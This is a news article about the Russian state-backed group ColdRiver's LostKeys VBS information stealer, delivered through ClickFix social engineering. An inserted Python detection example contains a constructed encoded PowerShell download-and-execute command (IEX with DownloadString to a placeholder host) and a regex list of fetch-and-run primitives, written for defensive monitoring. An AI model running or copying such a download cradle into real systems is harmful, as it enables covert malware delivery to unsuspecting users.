Careful! Russian Malware 'LostKeys' Can Secretly Siphon Personal Files!
JAKARTA - The state-backed Russian hacker group ColdRiver is using a new malware strain called LostKeys in espionage attacks against Western entities. The Google Threat Intelligence Group (GTIG) found the tool being used in a social engineering scheme to steal files and system data.
ColdRiver has ties to Russia's Federal Security Service (FSB), and the US State Department is offering millions of dollars in rewards for information on the group.
The shadowy world of cyber espionage has a new player: a cunning malware strain dubbed LostKeys. According to Google, a state-backed hacker group called ColdRiver has been using LostKeys since the beginning of this year to spy on Western governments, journalists, think tanks, and non-governmental organizations (NGOs).
ColdRiver itself is not a new name. In December 2024, Britain, together with the 'Five Eyes' intelligence alliance, directly accused the group of being a digital espionage actor. ColdRiver has direct ties to the FSB, Russia's domestic intelligence and security agency.
GTIG first detected LostKeys in January. ColdRiver used the malware in a targeted campaign built around the technique known as ClickFix. The attack is essentially a digital scam relying on social engineering: victims are persuaded to run malicious PowerShell scripts themselves.
Once run, the script downloads and executes additional scripts that install LostKeys. The malware is identified as a Visual Basic Script (VBS)-based information stealer capable of exfiltrating specific files and folders, sending system information to attacker-controlled servers, and executing additional commands.
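The chain described above (a user talked into running a PowerShell command that fetches further code, which then installs a VBS stealer) leaves a characteristic process trail that defenders can look for. The following Python script is an added detection example, not code from the article, from GTIG, or from any vendor: it scores constructed, simplified process-creation events (in the shape of Sysmon Event ID 1) for the telltale combination of a hidden, policy-bypassing, encoded PowerShell launch carrying a download cradle, followed by a script host running a VBS file from a user-writable path. The event field names, the example.invalid URL, the indicator list and the "two or more reasons" threshold are all assumptions for illustration.

```python
import base64
import re


def _encode_ps(script: str) -> str:
    """Base64-encode a command the way PowerShell's -EncodedCommand expects (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events (simplified Sysmon Event ID 1 fields), hand-written for
# this example; none of them come from a real incident.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe",
     "cmdline": "explorer.exe"},
    # Stage 1 as the article describes it: a user-run PowerShell command that is hidden,
    # bypasses execution policy, is encoded, and pulls more code from a remote host.
    {"pid": 5204, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc "
                + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage')")},
    # Stage 2: the downloaded stage drops a VBS file and runs it through wscript.exe.
    {"pid": 5310, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"wscript.exe C:\Users\alice\AppData\Local\Temp\update.vbs"},
    # Benign control: an interactive PowerShell session listing a directory.
    {"pid": 6002, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe Get-ChildItem C:\\Projects"},
]

# Command-line switches that are common in pasted "fix" one-liners and rare in admin use.
SUSPICIOUS_FLAGS = {
    r"-(?:nop|noprofile)\b": "profile disabled",
    r"-(?:w|windowstyle)\s+hidden\b": "hidden window",
    r"-(?:ep|executionpolicy)\s+bypass\b": "execution policy bypass",
    r"-(?:e|ec|enc|encodedcommand)\s+": "encoded command",
}
# Download-and-execute primitives, checked on the decoded command text.
DOWNLOAD_CRADLE = re.compile(
    r"(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|"
    r"invoke-expression|\biex\b|net\.webclient|start-bitstransfer)", re.IGNORECASE)
# Directories an ordinary user can write to without elevation.
USER_WRITABLE = re.compile(r"\\(?:appdata|temp|downloads|public)\\", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload if one is present, else the command line unchanged."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def analyze(events):
    """Score each event; report those that accumulate at least two independent reasons."""
    findings = []
    for ev in events:
        image = ev["image"].lower()
        parent = ev["parent_image"].lower()
        cmd = ev["cmdline"]
        reasons = []
        if image.endswith("powershell.exe"):
            for pattern, label in SUSPICIOUS_FLAGS.items():
                if re.search(pattern, cmd, re.IGNORECASE):
                    reasons.append(label)
            if DOWNLOAD_CRADLE.search(decode_encoded_command(cmd)):
                reasons.append("download-and-execute cradle")
            # A suspicious launch straight from the desktop shell fits a user pasting a command.
            if parent.endswith("explorer.exe") and reasons:
                reasons.append("launched from interactive shell (explorer.exe)")
        elif image.endswith(("wscript.exe", "cscript.exe")):
            if parent.endswith("powershell.exe"):
                reasons.append("script host spawned by PowerShell")
            if USER_WRITABLE.search(cmd) and re.search(r"\.vbs\b", cmd, re.IGNORECASE):
                reasons.append("VBS run from user-writable path")
        if len(reasons) >= 2:
            findings.append({"pid": ev["pid"], "image": ev["image"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"pid {f['pid']} {f['image']}: " + "; ".join(f["reasons"]))
```

Requiring two independent reasons keeps a lone `-ep bypass` in an admin's script from paging anyone, while the stage 1 and stage 2 events above each trip several indicators; in a real deployment the same logic would read Sysmon or EDR telemetry and correlate the two events by parent process ID.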
Usually, ColdRiver steals login credentials to gain access to the victim's email and contact list. However, the group is also known to have used another malware strain called SPICA to steal documents. LostKeys appears to be reserved for more specific and selective cases, making it a specialized tool in ColdRiver's intelligence operations.
Interestingly, ColdRiver is not the only group to use the ClickFix method. Other state-sponsored groups such as Kimsuky (North Korea), MuddyWater (Iran), and other Russian actors such as APT28 and UNK_RemoteRogue have used similar tactics in their recent espionage campaigns.
ColdRiver, also known by other names such as Star Blizzard and Callisto Group, has honed its social engineering and open-source intelligence gathering capabilities since at least 2017. Its targets include defense organizations, governments, and political figures. Its attacks have increased sharply since Russia's invasion of Ukraine, extending even to defense industry facilities and the US Department of Energy.
The US government has imposed sanctions on several ColdRiver members, including one suspected of being an FSB officer. US authorities are currently offering rewards of up to $10 million to anyone who can provide information to track down other members, which shows how serious a threat this group poses.